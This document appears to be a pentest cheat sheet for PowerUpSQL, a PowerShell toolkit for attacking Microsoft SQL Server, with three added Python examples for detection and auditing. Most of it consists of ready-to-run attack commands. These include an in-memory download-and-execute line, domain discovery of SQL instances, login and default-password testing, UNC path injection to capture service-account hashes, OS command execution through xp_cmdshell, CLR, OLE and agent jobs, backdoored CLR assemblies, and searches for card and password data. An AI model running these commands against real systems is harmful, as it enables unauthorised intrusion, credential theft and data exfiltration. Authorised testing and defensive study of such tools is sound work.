# PowerUpSQL

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Link: <https://github.com/NetSPI/PowerUpSQL>

Example:

```
PS /opt/PowerUpSQL> Import-Module .\PowerUpSQL.psd1  
PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose 
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)... 
VERBOSE: 0 SPNs found. 
VERBOSE: Parsing SQL Server instances from SPNs... 
VERBOSE: 0 instances were found. 
```

Or load it directly into memory without touching disk:

```
IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.0.1/PowerUpSQL.ps1")
```

## Commands:

### Find information on local server

`PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfo`

Test the connection to the discovered servers:

`Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10`

Search for data in a SQL instance:

```
PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password"

ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC
------------   --------                   -------- ------ -----    ------ ------           -------- ----
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False
```
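The `IsCC` column in the output above flags sampled values that look like card numbers, which is the same check a data-classification or DLP review applies. The following Python is an added example, not PowerUpSQL's own code: it splits a `-Keyword "card, password"` style argument into terms, matches them against column names, and applies a length plus Luhn (mod 10) check to each sample; that `IsCC` uses exactly this logic is an assumption, and the rows are constructed.

```python
import re

# Constructed sample of what a column-sampling query might return:
# (schema.table.column, sampled value) pairs, including the two rows
# shown in the page's example output.
SAMPLE_ROWS = [
    ("dbo.tracking.card", "4111111111111111"),
    ("dbo.tracking.card", "41111111111ASDFD"),
    ("dbo.users.Password", "Summer2019!"),
    ("dbo.orders.ship_date", "2019-07-04"),
]


def luhn_valid(value: str) -> bool:
    """Luhn (mod 10) check, the standard test for card-number-shaped strings."""
    digits = [int(c) for c in value]
    total = 0
    # Walk from the rightmost digit and double every second digit.
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def looks_like_card(sample: str) -> bool:
    """IsCC-style flag: digits only (spaces/dashes stripped), PAN length, Luhn-valid."""
    cleaned = re.sub(r"[ -]", "", sample)
    if not re.fullmatch(r"\d{13,19}", cleaned):
        return False
    return luhn_valid(cleaned)


def parse_keywords(keyword_arg: str) -> list:
    """Split a '-Keyword "card, password"' style argument into lower-case terms."""
    return [k.strip().lower() for k in keyword_arg.split(",") if k.strip()]


def find_sensitive_columns(rows, keyword_arg: str):
    """Return (column, sample, is_cc) for rows whose column name contains a keyword."""
    keywords = parse_keywords(keyword_arg)
    hits = []
    for column, sample in rows:
        name = column.rsplit(".", 1)[-1].lower()
        if any(k in name for k in keywords):
            hits.append((column, sample, looks_like_card(sample)))
    return hits


if __name__ == "__main__":
    for column, sample, is_cc in find_sensitive_columns(SAMPLE_ROWS, "card, password"):
        print(f"{column:<22} {sample:<18} IsCC={is_cc}")
```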

## Cheatsheet

### SQL Server Discovery Cheats

| Description | Command |
| --- | --- |
| Discover Local SQL Server Instances | `Get-SQLInstanceLocal -Verbose` |
| Discover Remote SQL Server Instances | <p>UDP Broadcast Ping<br><code>Get-SQLInstanceBroadcast -Verbose</code><br><br>UDP Port Scan<br><code>Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1</code><br><br>Get the instance list from a file<br><code>Get-SQLInstanceFile -FilePath c:\temp\computers.txt \| Get-SQLInstanceScanUDPThreaded -Verbose</code></p> |
| Discover Active Directory Domain SQL Server Instances | `Get-SQLInstanceDomain -Verbose` |
| Discover Active Directory Domain SQL Server Instances using alternative domain credentials | <p><code>runas /noprofile /netonly /user:domain\user PowerShell.exe</code><br><code>Import-Module PowerUpSQL.psd1</code><br><code>Get-SQLInstanceDomain -Verbose -DomainController 192.168.1.1 -Username domain\user -Password P\@ssword123</code></p> |
| List SQL Servers using a specific domain account | `Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc` |
| List shared domain user SQL Server service accounts | `Get-SQLInstanceDomain -Verbose \| Group-Object DomainAccount \| Sort-Object count -Descending \| select Count,Name \| Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) }` |

### SQL Server Authentication Cheats

All PowerUpSQL functions support authenticating directly to a known SQL Server instance without having to perform discovery first. You can authenticate using the current domain user credentials or provide an SQL Server login. All PowerUpSQL functions will attempt to authenticate to the provided instance as the current domain user if the username/password parameters are not provided. This also applies if you're running PowerShell through runas /netonly.

Below are some basic examples using the "Get-SQLQuery" function.

| Description                                                               | Command Examples                                                                                                                                                                                                                                                                                                                                                                                                                                                      |
| ------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Authenticating to a known SQL Server instance as the current domain user. | <p><strong>Current Domain User</strong><br><code>Get-SQLQuery -Verbose -Instance "10.2.2.5,1433"</code></p>                                                                                                                                                                                                                                                                                                                                                           |
| Authenticating to a known SQL Server instance using a SQL Server login.   | <p><strong>Server and Instance Name</strong><br><code>Get-SQLQuery -Verbose -Instance "servername\instancename" -username testuser -password testpass</code><br><br><strong>IP and Instance Name</strong><br><code>Get-SQLQuery -Verbose -Instance "10.2.2.5\instancename" -username testuser -password testpass</code><br><br><strong>IP and Port</strong><br><code>Get-SQLQuery -Verbose -Instance "10.2.2.5,1433" -username testuser -password testpass</code></p> |

### SQL Server Login Test Cheats

| Description | Command |
| --- | --- |
| Get a list of domain SQL servers that can be logged into with a provided SQL Server login | <p><code>$Targets = Get-SQLInstanceDomain -Verbose \| Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username testuser -password testpass \| Where-Object {$\_.Status -like "Accessible"}</code><br><code>$Targets</code></p> |
| Get a list of domain SQL servers that can be logged into with the current domain account | <p><code>$Targets = Get-SQLInstanceDomain -Verbose \| Get-SQLConnectionTestThreaded -Verbose -Threads 10 \| Where-Object {$\_.Status -like "Accessible"}</code><br><code>$Targets</code></p> |
| Get a list of domain SQL servers that can be logged into using an alternative domain account | <p><code>runas /noprofile /netonly /user:domain\user PowerShell.exe</code><br><code>Get-SQLInstanceDomain \| Get-SQLConnectionTestThreaded -Verbose -Threads 15</code></p> |
| Get a list of domain SQL servers that can be logged into using an alternative domain account from a non-domain system | <p><code>runas /noprofile /netonly /user:domain\user PowerShell.exe</code><br><code>Get-SQLInstanceDomain -Verbose -Username 'domain\user' -Password 'MyPassword!' -DomainController 10.1.1.1 \| Get-SQLConnectionTestThreaded -Verbose -Threads 15</code></p> |
| Discover domain SQL Servers and determine if they are configured with default passwords used by common applications, based on the instance name | `Get-SQLInstanceDomain \| Get-SQLServerLoginDefaultPw -Verbose` |

### SQL Server Authenticated Information Gathering Cheats

| Description | Command |
| --- | --- |
| Get general server information such as SQL/OS versions, service accounts, sysadmin access, etc. | <p>Get information from a single server<br><code>Get-SQLServerInfo -Verbose -Instance SQLServer1\Instance1</code><br><br>Get information from domain servers<br><code>$ServerInfo = Get-SQLInstanceDomain \| Get-SQLServerInfoThreaded -Verbose -Threads 10</code><br><code>$ServerInfo</code><br><br>Note: Running this against domain systems can reveal where Domain Users have sysadmin privileges.</p> |
| Get an inventory of common objects from the remote server, including permissions, databases, tables, views, etc., and dump them out into CSV files. | `Invoke-SQLDumpInfo -Verbose -Instance Server1\Instance1` |

### SQL Server Privilege Escalation Cheats

| Description | Command |
| --- | --- |
| <p>Domain User to SQL Service Account.<br>While running as a domain user this function will automatically do four things: 1. Identify SQL Servers on the domain via an LDAP query to a DC for SPNs. 2. Attempt to log into each. 3. Perform UNC path injection using various methods. 4. Attempt to capture the password hashes for the associated SQL Server service account.</p> | `Invoke-SQLUncPathInjection -Verbose -CaptureIp 10.1.1.12` |
| OS admin to sysadmin via service account impersonation; afterwards all PowerUpSQL commands can be run as a sysadmin. | `Invoke-SQLImpersonateService -Verbose -Instance MSSQLSRV04\BOSCHSQL` |
| Audit for issues | `Invoke-SQLAudit -Verbose -Instance SQLServer1` |
| Escalate to sysadmin | `Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1` |
| Execute OS commands: xp\_cmdshell | `$Targets \| Invoke-SQLOSCmd -Verbose -Command "Whoami" -Threads 10` |
| Execute OS commands: Custom xp | <p><code>Create-SQLFileXpDll -OutFile c:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp\_test -Verbose</code><br>Host the test.dll on a share readable by the SQL Server service account.<br><code>Get-SQLQuery -Verbose -Query "sp\_addextendedproc 'xp\_test', '\\\\yourserver\yourshare\myxp.dll'"</code><br><code>xp\_test</code><br><code>sp\_dropextendedproc 'xp\_test'</code></p> |
| Execute OS commands: CLR | `$Targets \| Invoke-SQLOSCLR -Verbose -Command "Whoami"` |
| Execute OS commands: Ole Automation Procedures | `$Targets \| Invoke-SQLOSOle -Verbose -Command "Whoami"` |
| Execute OS commands: External Scripting - R | `$Targets \| Invoke-SQLOSR -Verbose -Command "Whoami"` |
| Execute OS commands: External Scripting - Python | `$Targets \| Invoke-SQLOSPython -Verbose -Command "Whoami"` |
| Execute OS commands: Agent Job - CmdExec | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"` |
| Execute OS commands: Agent Job - PowerShell | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" \| out-file c:\windows\temp\test2.txt' -Sleep 20` |
| Execute OS commands: Agent Job - VBScript | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem VBScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt'` |
| Execute OS commands: Agent Job - JScript | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt'` |
| Crawl database links | `Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1` |
| Crawl database links and execute a query | <p><code>Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1 -Query "select name from master..sysdatabases"</code><br>Blog: <a href="https://blog.netspi.com/sql-server-link-crawling-powerupsql/">https://blog.netspi.com/sql-server-link-crawling-powerupsql/</a></p> |
| Crawl database links and execute an OS command | `Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'"` |
| Dump the contents of Agent jobs. These often contain passwords. Verbose output includes job summary data. | <p><code>$Results = Get-SQLAgentJob -Verbose -Instance Server1\Instance1 -Username sa -Password 'P\@ssword!'</code><br>or<br><code>$Results = Get-SQLInstanceDomain -Verbose \| Get-SQLAgentJob -Verbose -Username sa -Password 'P\@ssword!'</code><br><code>$Results \| Out-GridView</code></p> |
| Enumerate all SQL logins as a least-privilege user and test each username as its password. | <p>Run against a single server<br><code>Invoke-SQLAuditWeakLoginPw -Verbose -Instance SQLServer1\Instance1</code><br>Run against domain SQL Servers<br><code>$WeakPasswords = Get-SQLInstanceDomain -Verbose \| Invoke-SQLAuditWeakLoginPw -Verbose</code><br><code>$WeakPasswords</code></p> |
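Every "Execute OS commands" row above depends on a server option (xp_cmdshell, Ole Automation Procedures, clr enabled, external scripts enabled, Agent XPs) being switched on with sp_configure, and SQL Server records each such change in its ERRORLOG as "Configuration option '<name>' changed from <old> to <new>." The Python below is an added detection example, not part of PowerUpSQL: it parses those lines, alerts on any watched option flipped from 0 to 1, and pairs a 'show advanced options' enable with a watched-option enable on the same spid inside a short window, which is the sequence these tools produce. The log excerpt is constructed, not a real capture.

```python
import re
from datetime import datetime

# Constructed ERRORLOG excerpt (not a real capture). The message text matches
# what SQL Server writes when sp_configure changes a setting.
ERRORLOG_LINES = """\
2024-03-12 09:15:02.31 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-12 09:15:02.34 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-12 09:16:40.10 spid61      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-12 09:20:11.77 spid61      Configuration option 'clr enabled' changed from 1 to 1. Run the RECONFIGURE statement to install.
2024-03-12 09:21:03.05 spid44      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-03-12 09:30:00.00 spid12      Using 'dbghelp.dll' version '4.0.5'
""".splitlines()

# Server options that enable the OS-command paths listed in the table above.
OS_EXEC_OPTIONS = {
    "xp_cmdshell": "xp_cmdshell",
    "Ole Automation Procedures": "OLE Automation (sp_OACreate)",
    "clr enabled": "CLR assemblies",
    "external scripts enabled": "external scripting (R/Python)",
    "Agent XPs": "SQL Agent extended procedures",
}

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def parse_config_changes(lines):
    """Yield one dict per 'Configuration option ... changed' line; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["old"], ev["new"] = int(ev["old"]), int(ev["new"])
            yield ev


def find_os_exec_enablement(lines):
    """Alert on watched options flipped 0 -> 1; a 'changed from 1 to 1' no-op is ignored."""
    alerts = []
    for ev in parse_config_changes(lines):
        if ev["option"] in OS_EXEC_OPTIONS and ev["old"] == 0 and ev["new"] == 1:
            alerts.append({
                "ts": ev["ts"],
                "spid": ev["spid"],
                "option": ev["option"],
                "capability": OS_EXEC_OPTIONS[ev["option"]],
            })
    return alerts


def find_escalation_sequences(lines, window_seconds=60):
    """Pair 'show advanced options' 0 -> 1 with a watched-option enable on the same spid.

    Returns (spid, option, seconds_between) tuples; the two-step sequence within
    seconds on one session is the tell-tale shape of a tool rather than an admin.
    """
    advanced_on = {}  # spid -> time 'show advanced options' was enabled
    sequences = []
    for ev in parse_config_changes(lines):
        ts = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
        if ev["option"] == "show advanced options" and ev["new"] == 1:
            advanced_on[ev["spid"]] = ts
        elif ev["option"] in OS_EXEC_OPTIONS and ev["old"] == 0 and ev["new"] == 1:
            start = advanced_on.get(ev["spid"])
            if start is not None:
                delta = (ts - start).total_seconds()
                if delta <= window_seconds:
                    sequences.append((ev["spid"], ev["option"], delta))
    return sequences


if __name__ == "__main__":
    for a in find_os_exec_enablement(ERRORLOG_LINES):
        print(f"{a['ts']} {a['spid']} enabled {a['option']} ({a['capability']})")
    for spid, option, secs in find_escalation_sequences(ERRORLOG_LINES):
        print(f"{spid}: advanced options -> {option} within {secs:.2f}s")
```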

### SQL Server Data Targeting Cheats

| Description                                                                                     | Command                                                                                                                                                                                                                                     |
| ----------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Dump an inventory of common objects to csv in the current directory.                            | `Invoke-SQLDumpInfo -Verbose -Instance server1\instance1`                                                                                                                                                                                   |
| Execute arbitrary query                                                                         | `$Targets \| Get-SQLQuery -Verbose -Query "Select @@version"`                                                                                                                                                                               |
| Grab basic server information                                                                   | `$Targets \| Get-SQLServerInfoThreaded -Threads 10 -Verbose`                                                                                                                                                                                |
| Grab list of non-default databases                                                              | `$Targets \| Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults`                                                                                                                                                                      |
| Dump common information from server to files                                                    | `Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv`                                                                                                                                                                           |
| Find sensitive data based on column name                                                        | `$Targets \| Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,ssn,password" -SampleSize 2 -ValidateCC -NoDefaults`                                                                                                     |
| Find sensitive data based on column name, but only target databases with transparent encryption | `$Targets \| Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults \| Where-Object {$_.is_encrypted -eq "TRUE"} \| Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password" -SampleSize 2 -ValidateCC -NoDefaults` |

### Miscellaneous Post Exploitation Cheats

| Description | Command |
| ----------- | ------- |
| Export all custom CLR assemblies to DLLs. They can be decompiled offline, and often contain passwords. Also, they can be backdoored without too much effort. | <p><code>$Results = Get-SQLStoredProcedureCLR -Verbose -Instance Server1\Instance1 -Username sa -Password 'P@ssword!' -ExportFolder c:\temp</code><br><code>$Results \| Out-GridView</code></p> |
| Create a SQL command that can be used to import an existing (or backdoored) CLR assembly. | <p><code>Create-SQLFileCLRDll -Verbose -SourceDllPath c:\temp\evil.dll</code><br>Blog: <a href="https://blog.netspi.com/attacking-sql-server-clr-assemblies/">https://blog.netspi.com/attacking-sql-server-clr-assemblies/</a></p> |
| Create a DLL and SQL command that can be used to import a CLR assembly to execute OS commands. | `Create-SQLFileCLRDll -Verbose -ProcedureName runcmd -OutDir c:\temp -OutFile evil` |
| Get a list of Shared SQL Server service accounts | <p><code>Get-SQLInstanceDomain -Verbose \| Select-Object DomainAccount, ComputerName -Unique \| Group-Object DomainAccount \| Sort-Object Count -Descending</code><br><br>Note: Any count greater than 1 indicates a domain account used on multiple systems that could potentially be used for SMB Relay attacks.</p> |
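The last row groups SQL Server instances by the domain account that runs them; a count above one is exactly what a defender wants to find as well, because a service account shared across hosts is the thing to split into per-instance (group managed) accounts and to cover with SMB signing. The following is an added example written for this page, not PowerUpSQL code; it performs the same grouping offline over a constructed list of MSSQLSvc SPNs paired with their owning account, in the form a directory export such as `setspn` output can be reduced to.

```python
"""Group MSSQLSvc SPNs by owning account to find accounts shared across hosts."""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# (SPN, owning account): constructed sample data with hypothetical hosts.
# A host with a default and a named instance registers more than one SPN,
# so grouping must count distinct hosts, not SPNs.
SAMPLE_SPNS: List[Tuple[str, str]] = [
    ("MSSQLSvc/sqlserver1.corp.local:1433", "CORP\\svc_sql"),
    ("MSSQLSvc/sqlserver1.corp.local", "CORP\\svc_sql"),
    ("MSSQLSvc/sqlserver2.corp.local:1433", "CORP\\svc_sql"),
    ("MSSQLSvc/sqlserver3.corp.local:STANDARDDEV2014", "CORP\\svc_sql_dev"),
    ("MSSQLSvc/sqlserver4.corp.local:1433", "CORP\\SQLSERVER4$"),
]


def host_from_spn(spn: str) -> str:
    """'MSSQLSvc/host[:port|instance]' -> 'host' (lower-cased)."""
    service, _, rest = spn.partition("/")
    if service.upper() != "MSSQLSVC" or not rest:
        raise ValueError(f"not an MSSQLSvc SPN: {spn!r}")
    return rest.split(":", 1)[0].lower()


def hosts_by_account(spns: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each account to the sorted, de-duplicated hosts it serves."""
    hosts: Dict[str, set] = defaultdict(set)
    for spn, account in spns:
        hosts[account].add(host_from_spn(spn))
    return {acct: sorted(h) for acct, h in hosts.items()}


def shared_accounts(spns: Iterable[Tuple[str, str]] = SAMPLE_SPNS) -> Dict[str, List[str]]:
    """Only the accounts used on more than one host, largest footprint first."""
    shared = {a: h for a, h in hosts_by_account(spns).items() if len(h) > 1}
    return dict(sorted(shared.items(), key=lambda kv: len(kv[1]), reverse=True))


if __name__ == "__main__":
    for account, hosts in shared_accounts().items():
        print(f"{account}: {len(hosts)} hosts -> {', '.join(hosts)}")
```

Machine accounts (the `$`-suffixed entry) and accounts with a single host drop out, leaving the short list whose credentials would be exposed on more than one system if any one of them were compromised.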
